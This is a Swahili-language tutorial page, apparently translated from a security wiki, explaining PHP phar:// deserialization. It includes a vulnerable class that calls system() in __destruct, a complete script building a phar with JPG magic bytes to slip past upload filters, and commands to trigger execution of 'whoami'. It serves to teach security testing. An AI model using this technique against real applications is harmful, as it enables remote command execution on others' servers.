phar:// deserialization

Reading time: 3 minutes

Phar files (PHP Archive) files zina metadata katika muundo wa serialized, hivyo, wakati zinapochambuliwa, hii metadata inakuwa deserialized na unaweza kujaribu kutumia udhaifu wa deserialization ndani ya PHP code.

Jambo bora kuhusu sifa hii ni kwamba hii deserialization itatokea hata kwa kutumia kazi za PHP ambazo hazifanyi eval PHP code kama file_get_contents(), fopen(), file() au file_exists(), md5_file(), filemtime() au filesize().

Hivyo, fikiria hali ambapo unaweza kufanya PHP web ipate ukubwa wa faili isiyo na mipaka kwa kutumia phar:// protokali, na ndani ya code unapata class inayofanana na ifuatayo:

<?php
class AnyClass {
public $data = null;
public function __construct($data) {
$this->data = $data;
}

function __destruct() {
system($this->data);
}
}

filesize("phar://test.phar"); #The attacker can control this path

Unaweza kuunda faili la phar ambalo linapoload litafanya kudhulumu darasa hili ili kutekeleza amri zisizo na mpangilio kwa kitu kama:

<?php

class AnyClass {
public $data = null;
public function __construct($data) {
$this->data = $data;
}

function __destruct() {
system($this->data);
}
}

// create new Phar
$phar = new Phar('test.phar');
$phar->startBuffering();
$phar->addFromString('test.txt', 'text');
$phar->setStub("\xff\xd8\xff\n<?php __HALT_COMPILER(); ?>");

// add object of any class as meta data
$object = new AnyClass('whoami');
$phar->setMetadata($object);
$phar->stopBuffering();

Kumbuka jinsi bajeti za kichawi za JPG (\xff\xd8\xff) zimeongezwa mwanzoni mwa faili la phar ili kuepuka uwezekano wa mipaka ya kupakia faili.
Tengeneza faili la test.phar kwa:

php --define phar.readonly=0 create_phar.php

Na utendaji wa amri whoami kwa kutumia msimbo dhaifu kwa:

php vuln.php

Marejeleo

{{#ref}} https://blog.ripstech.com/2018/new-php-exploitation-technique/ {{#endref}}